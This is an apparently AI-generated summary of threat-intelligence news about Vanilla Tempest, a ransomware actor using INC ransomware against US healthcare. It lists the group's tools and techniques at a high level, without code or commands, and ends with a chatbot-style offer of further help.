September 19, 2024 at 06:24AM
A financially motivated threat actor, under the name Vanilla Tempest, has been targeting the healthcare sector in the U.S. using a ransomware strain called INC. This actor is known for using various tools and techniques, such as deploying ransomware payloads through Windows Management Instrumentation and exfiltrating data using Azure tools. Microsoft’s threat intelligence team is actively tracking this activity.
From the meeting notes, I gathered the following key points:
– Microsoft has identified a financially motivated threat actor using a ransomware strain called INC to target the healthcare sector in the U.S. This activity is being tracked by Microsoft’s threat intelligence team under the name Vanilla Tempest (formerly DEV-0832).
– Vanilla Tempest is receiving hand-offs from GootLoader infections by the threat actor Storm-0494 and deploying tools like the Supper backdoor, AnyDesk remote monitoring and management tool, and the MEGA data synchronization tool. The attackers then carry out lateral movement through Remote Desktop Protocol (RDP) and use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.
– This threat actor has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families.
– The threat actor is also tracked under the name Vice Society, known for using already existing lockers to carry out attacks.
– Ransomware groups like BianLian and Rhysida are observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks.
Let me know if there’s anything specific you’d like to focus on or any additional details you need from the meeting notes.